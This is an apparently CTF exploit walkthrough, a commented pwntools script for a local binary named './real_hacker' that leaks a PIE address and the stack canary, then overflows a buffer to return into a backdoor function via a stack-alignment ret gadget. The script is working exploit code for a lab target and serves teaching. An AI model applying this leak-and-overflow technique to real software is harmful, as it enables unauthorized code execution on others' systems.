带栈对齐的rop

from pwn import *

# Walkthrough of the './real_hacker' CTF exploit (post title: "ROP with stack
# alignment"). The binary prints an address, then reads a name and a message;
# the script uses those two steps to defeat PIE and the stack canary before
# returning into the binary's own `backdoor` function. Every offset below
# (40, 48, 72) is specific to this binary's stack layout.
context.binary = './real_hacker'
elf = ELF('./real_hacker')
p = process('./real_hacker')  # local process only; no remote target on this page

# --- PIE base ---------------------------------------------------------------
# The program leaks main's runtime address. Subtracting main's file-offset
# symbol gives the load base, which re-bases every other ELF symbol.
p.recvuntil(b'address -> ')
main_addr = int(p.recvline().strip(), 16)
base_addr = main_addr - elf.symbols['main']
backdoor_addr = base_addr + elf.symbols['backdoor']

# A lone `ret` gadget is used only for stack alignment: it consumes one 8-byte
# slot so rsp is 16-byte aligned when backdoor runs (glibc routines such as
# system()/printf assume that alignment). ROP(elf) returns a file offset, so
# it is re-based like any PIE address.
rop = ROP(elf)
ret = rop.find_gadget(['ret'])[0] + base_addr

# --- Canary leak ------------------------------------------------------------
# 40 bytes of name presumably fill the buffer up to the canary, so the greeting
# that echoes the name runs on into the canary bytes.
p.sendlineafter(b'name: ', b'a' * 40)
output = p.recvuntil(b'message: ')
# glibc's x86-64 canary has a NUL low byte, which the echo stops at or skips;
# the 7 bytes at offset 48 past 'Hello, ' are the remaining bytes, and the
# b'\x00' re-prepended before u64 rebuilds the full 8-byte value.
canary = u64(b'\x00' + output[output.index(b'Hello, ')+48:][0:7])


# NOTE(review): '-1' is presumably the answer to a length/count prompt that
# lets the following message read overflow; the prompt itself is not visible
# on this page — confirm against the binary.
p.sendline(b'-1')
# Frame overwrite: 72 bytes of padding up to the canary, the leaked canary so
# the stack-protector check passes, 0 for what is assumed to be the saved rbp
# slot, the `ret` gadget for alignment, then the backdoor address.
# Defensive takeaway: PIE and the canary are both nullified by the two info
# leaks above; the actual root cause is the unbounded message read.
payload = flat([
    b'A' * 72,
    canary,
    0,
    ret,
    backdoor_addr
])
p.sendafter(b'message: ', payload)
p.interactive()
